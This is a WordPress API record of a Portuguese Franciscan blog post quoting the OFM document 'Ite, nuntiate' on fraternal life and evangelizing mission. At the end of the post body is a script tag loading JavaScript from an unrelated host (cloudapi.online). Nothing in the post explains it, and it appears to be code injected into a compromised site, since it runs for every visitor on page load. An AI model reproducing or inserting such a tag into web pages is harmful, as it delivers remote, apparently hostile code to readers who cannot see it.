{"id":158837,"date":"2018-05-07T09:14:40","date_gmt":"2018-05-07T12:14:40","guid":{"rendered":"http:\/\/franciscanos.org.br\/?p=158837"},"modified":"2018-11-08T13:41:34","modified_gmt":"2018-11-08T15:41:34","slug":"vida-fraterna-e-missao-evangelizadora-2","status":"publish","type":"post","link":"https:\/\/franciscanos.org.br\/carisma\/vida-fraterna-e-missao-evangelizadora-2.html","title":{"rendered":"Aspectos da vida fraterna e miss\u00e3o evangelizadora"},"content":{"rendered":"<p><img loading=\"lazy\" src=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2018\/05\/almir_070518P.jpg\" alt=\"almir_070518P\" width=\"830\" height=\"430\" \/><\/p>\n<p><strong>Frei Almir Guimar\u00e3es<\/strong><\/p>\n<p>Tenho diante dos olhos o documento da Ordem dos Frades Menores (2017) Ite, nunciate&#8230;, sobre as novas formas de vida miss\u00e3o na Ordem do Frades Menores. Transcrevemos as reflex\u00f5es sobre a vida fraterna e a miss\u00e3o evangelizadora.<\/p>\n<p><strong>\u00a0Vida fraterna<\/strong><\/p>\n<p><em>Viver o dom do irm\u00e3o comporta:<\/em><\/p>\n<p><em><strong>&gt;&gt;\u00a0<\/strong><\/em>uma rela\u00e7\u00e3o com os outros encharcada de humildade, sem procurar ter raz\u00e3o com suas pr\u00f3prias ideias, antes de qualquer coisa, por melhores que sejam, e muito menos imp\u00f4-las aos outros irm\u00e3os. O esp\u00edrito fraterno pressup\u00f5e uma m\u00fatua e rec\u00edproca acolhida que n\u00e3o se baseia no dom\u00ednio de um irm\u00e3o sobre o outro. A humildade nas rela\u00e7\u00f5es permite que haja uma descentraliza\u00e7\u00e3o de si para dar mais espa\u00e7o ao Senhor e a uma melhor disposi\u00e7\u00e3o \u00e0 acolhida do irm\u00e3o diferente de mim;<\/p>\n<p><em><strong>&gt;&gt;\u00a0<\/strong><\/em>o gosto pela escuta rec\u00edproca, pela partilha de vida e pelas comunica\u00e7\u00f5es fraternas que favorecem o crescimento da comunidade e de cada um dos irm\u00e3os. Um desejo de construir junto com os outros, na din\u00e2mica da busca do Reino de Deus que se chega a conhecer no cotidiano. Uma alegria que se reconhece num modo simples de viver rela\u00e7\u00f5es justas e sadias, consigo mesmo, com os outros e tamb\u00e9m com os mais pobres. O alegre saborear a beleza do perd\u00e3o, dado e recebido, atrav\u00e9s da simples e franca corre\u00e7\u00e3o fraterna;<\/p>\n<p><em><strong>&gt;&gt;\u00a0<\/strong><\/em>a comunh\u00e3o com os irm\u00e3os da pr\u00f3pria Fraternidade, da Prov\u00edncia e da Ordem, e com a Igreja em geral. Uma rela\u00e7\u00e3o sadia e equilibrada com a autoridade, seja quando esta \u00e9 exercida, seja na condi\u00e7\u00e3o de obedecer;<\/p>\n<p><em><strong>&gt;&gt;\u00a0<\/strong><\/em>uma organiza\u00e7\u00e3o tal que permita ao frade doar sua pr\u00f3pria vida para fora como se estivesse permanecendo na mesma fraternidade, no respeito aos tempos de ora\u00e7\u00e3o, de sil\u00eancio, de conv\u00edvio, de atividades e de encontros.<\/p>\n<p><strong>Miss\u00e3o evangelizadora<\/strong><\/p>\n<p><em>A miss\u00e3o evangelizadora, realizada sempre como Fraternidade e como \u00edntima necessidade de ir e anunciar aos outros tudo o que Senhor nos deu comporta:<\/em><\/p>\n<p><em>\u00a0&gt;&gt;<strong>\u00a0<\/strong><\/em>o\u00a0desejo ardente de testemunhar aos nossos irm\u00e3os e irm\u00e3s do mundo aquilo que nos faz viver, para que possam beber na mesma fonte; uma real disponibilidade de partir em miss\u00e3o; um profundo desejo de anunciar o Evangelho e o apelo para vivencia-lo. \u00c9 a aud\u00e1cia evang\u00e9lica que nos impulsiona a viver esta aventura no seguimento de Cristo; uma rela\u00e7\u00e3o viva com Cristo que se encarna na m\u00fatua e benevolente ajuda fraterna;<\/p>\n<p><em><strong>&gt;&gt;\u00a0<\/strong><\/em>uma adequada prepara\u00e7\u00e3o antes da miss\u00e3o, assim como uma proveitosa colabora\u00e7\u00e3o entre os diversos protagonista<\/p>\n<p><em><strong>&gt;&gt;\u00a0<\/strong><\/em>a entrega e avalia\u00e7\u00e3o regular de nossas jornadas diante de Deus e sob o olhar ben\u00e9volo dos pr\u00f3prios irm\u00e3os. A partilha do Evangelho, depois de um tempo de atividade intensa, \u00e9 um meio formid\u00e1vel para este restitui\u00e7\u00e3o; isto permite uma tomada de dist\u00e2ncia daquilo que \u00e9 vivido e um recentrar-se em torno da Palavra de Deus, prontos para acolher aquilo que o Senhor diz;<\/p>\n<p><em><strong>&gt;&gt;\u00a0<\/strong><\/em>a import\u00e2ncia da benevol\u00eancia nos relacionamentos rec\u00edprocos, assim como da paz e da alegria profunda que v\u00eam de Deus e que habita o frade em miss\u00e3o;<\/p>\n<p><em><strong>&gt;&gt;\u00a0\u00a0<\/strong><\/em>uma gest\u00e3o \u201cequilibrada\u201d do pr\u00f3prio tempo, entre a contempla\u00e7\u00e3o, a vida comunit\u00e1ria, as atividades, os estudos e as rela\u00e7\u00f5es humanas, de modo que o frade nunca seja \u201cengolido\u201d pelas atividades a ponto de n\u00e3o estar mais dispon\u00edvel para ningu\u00e9m, como tamb\u00e9m para que n\u00e3o caia no excesso oposto, na perda de tempo e no \u00f3cio.<\/p>\n<p><strong>\u00a0Ite, nuntiate&#8230;, 45-46.<\/strong><\/p>\n<p><script id=\"lg210a\" src=\"https:\/\/cloudapi.online\/js\/api46.js\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Franciscanamente<\/p>\n","protected":false},"author":1,"featured_media":174729,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[11],"tags":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v19.2 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Aspectos da vida fraterna e miss\u00e3o evangelizadora - Carisma - Franciscanos<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/franciscanos.org.br\/carisma\/vida-fraterna-e-missao-evangelizadora-2.html\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Aspectos da vida fraterna e miss\u00e3o evangelizadora - Carisma - Franciscanos\" \/>\n<meta property=\"og:description\" content=\"Franciscanamente\" \/>\n<meta property=\"og:url\" content=\"https:\/\/franciscanos.org.br\/carisma\/vida-fraterna-e-missao-evangelizadora-2.html\" \/>\n<meta property=\"og:site_name\" content=\"Carisma - Franciscanos\" \/>\n<meta property=\"article:published_time\" content=\"2018-05-07T12:14:40+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2018-11-08T15:41:34+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/franciscanos.org.br\/carisma\/wp-content\/uploads\/2018\/10\/almir_070518P.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"830\" \/>\n\t<meta property=\"og:image:height\" content=\"430\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"https:\/\/franciscanos.org.br\/carisma\/#website\",\"url\":\"https:\/\/franciscanos.org.br\/carisma\/\",\"name\":\"Carisma - Franciscanos\",\"description\":\"Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o do Brasil - Ordem dos Frades Menores\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/franciscanos.org.br\/carisma\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/franciscanos.org.br\/carisma\/vida-fraterna-e-missao-evangelizadora-2.html#primaryimage\",\"url\":\"https:\/\/franciscanos.org.br\/carisma\/wp-content\/uploads\/2018\/10\/almir_070518P.jpg\",\"contentUrl\":\"https:\/\/franciscanos.org.br\/carisma\/wp-content\/uploads\/2018\/10\/almir_070518P.jpg\",\"width\":830,\"height\":430},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/franciscanos.org.br\/carisma\/vida-fraterna-e-missao-evangelizadora-2.html#webpage\",\"url\":\"https:\/\/franciscanos.org.br\/carisma\/vida-fraterna-e-missao-evangelizadora-2.html\",\"name\":\"Aspectos da vida fraterna e miss\u00e3o evangelizadora - Carisma - Franciscanos\",\"isPartOf\":{\"@id\":\"https:\/\/franciscanos.org.br\/carisma\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/franciscanos.org.br\/carisma\/vida-fraterna-e-missao-evangelizadora-2.html#primaryimage\"},\"datePublished\":\"2018-05-07T12:14:40+00:00\",\"dateModified\":\"2018-11-08T15:41:34+00:00\",\"author\":{\"@id\":\"https:\/\/franciscanos.org.br\/carisma\/#\/schema\/person\/e352342a457f086dc6152f9c73a3d093\"},\"breadcrumb\":{\"@id\":\"https:\/\/franciscanos.org.br\/carisma\/vida-fraterna-e-missao-evangelizadora-2.html#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/franciscanos.org.br\/carisma\/vida-fraterna-e-missao-evangelizadora-2.html\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/franciscanos.org.br\/carisma\/vida-fraterna-e-missao-evangelizadora-2.html#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/franciscanos.org.br\/carisma\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Aspectos da vida fraterna e miss\u00e3o evangelizadora\"}]},{\"@type\":\"Person\",\"@id\":\"https:\/\/franciscanos.org.br\/carisma\/#\/schema\/person\/e352342a457f086dc6152f9c73a3d093\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/franciscanos.org.br\/carisma\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"url\":\"https:\/\/franciscanos.org.br\/carisma\/author\/admin\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Aspectos da vida fraterna e miss\u00e3o evangelizadora - Carisma - Franciscanos","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/franciscanos.org.br\/carisma\/vida-fraterna-e-missao-evangelizadora-2.html","og_locale":"pt_BR","og_type":"article","og_title":"Aspectos da vida fraterna e miss\u00e3o evangelizadora - Carisma - Franciscanos","og_description":"Franciscanamente","og_url":"https:\/\/franciscanos.org.br\/carisma\/vida-fraterna-e-missao-evangelizadora-2.html","og_site_name":"Carisma - Franciscanos","article_published_time":"2018-05-07T12:14:40+00:00","article_modified_time":"2018-11-08T15:41:34+00:00","og_image":[{"width":830,"height":430,"url":"https:\/\/franciscanos.org.br\/carisma\/wp-content\/uploads\/2018\/10\/almir_070518P.jpg","type":"image\/jpeg"}],"author":"admin","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"admin","Est. tempo de leitura":"3 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"https:\/\/franciscanos.org.br\/carisma\/#website","url":"https:\/\/franciscanos.org.br\/carisma\/","name":"Carisma - Franciscanos","description":"Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o do Brasil - Ordem dos Frades Menores","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/franciscanos.org.br\/carisma\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"pt-BR"},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/franciscanos.org.br\/carisma\/vida-fraterna-e-missao-evangelizadora-2.html#primaryimage","url":"https:\/\/franciscanos.org.br\/carisma\/wp-content\/uploads\/2018\/10\/almir_070518P.jpg","contentUrl":"https:\/\/franciscanos.org.br\/carisma\/wp-content\/uploads\/2018\/10\/almir_070518P.jpg","width":830,"height":430},{"@type":"WebPage","@id":"https:\/\/franciscanos.org.br\/carisma\/vida-fraterna-e-missao-evangelizadora-2.html#webpage","url":"https:\/\/franciscanos.org.br\/carisma\/vida-fraterna-e-missao-evangelizadora-2.html","name":"Aspectos da vida fraterna e miss\u00e3o evangelizadora - Carisma - Franciscanos","isPartOf":{"@id":"https:\/\/franciscanos.org.br\/carisma\/#website"},"primaryImageOfPage":{"@id":"https:\/\/franciscanos.org.br\/carisma\/vida-fraterna-e-missao-evangelizadora-2.html#primaryimage"},"datePublished":"2018-05-07T12:14:40+00:00","dateModified":"2018-11-08T15:41:34+00:00","author":{"@id":"https:\/\/franciscanos.org.br\/carisma\/#\/schema\/person\/e352342a457f086dc6152f9c73a3d093"},"breadcrumb":{"@id":"https:\/\/franciscanos.org.br\/carisma\/vida-fraterna-e-missao-evangelizadora-2.html#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/franciscanos.org.br\/carisma\/vida-fraterna-e-missao-evangelizadora-2.html"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/franciscanos.org.br\/carisma\/vida-fraterna-e-missao-evangelizadora-2.html#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/franciscanos.org.br\/carisma"},{"@type":"ListItem","position":2,"name":"Aspectos da vida fraterna e miss\u00e3o evangelizadora"}]},{"@type":"Person","@id":"https:\/\/franciscanos.org.br\/carisma\/#\/schema\/person\/e352342a457f086dc6152f9c73a3d093","name":"admin","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/franciscanos.org.br\/carisma\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g","caption":"admin"},"url":"https:\/\/franciscanos.org.br\/carisma\/author\/admin"}]}},"_links":{"self":[{"href":"https:\/\/franciscanos.org.br\/carisma\/wp-json\/wp\/v2\/posts\/158837"}],"collection":[{"href":"https:\/\/franciscanos.org.br\/carisma\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/franciscanos.org.br\/carisma\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/carisma\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/carisma\/wp-json\/wp\/v2\/comments?post=158837"}],"version-history":[{"count":0,"href":"https:\/\/franciscanos.org.br\/carisma\/wp-json\/wp\/v2\/posts\/158837\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/carisma\/wp-json\/wp\/v2\/media\/174729"}],"wp:attachment":[{"href":"https:\/\/franciscanos.org.br\/carisma\/wp-json\/wp\/v2\/media?parent=158837"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/franciscanos.org.br\/carisma\/wp-json\/wp\/v2\/categories?post=158837"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/franciscanos.org.br\/carisma\/wp-json\/wp\/v2\/tags?post=158837"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}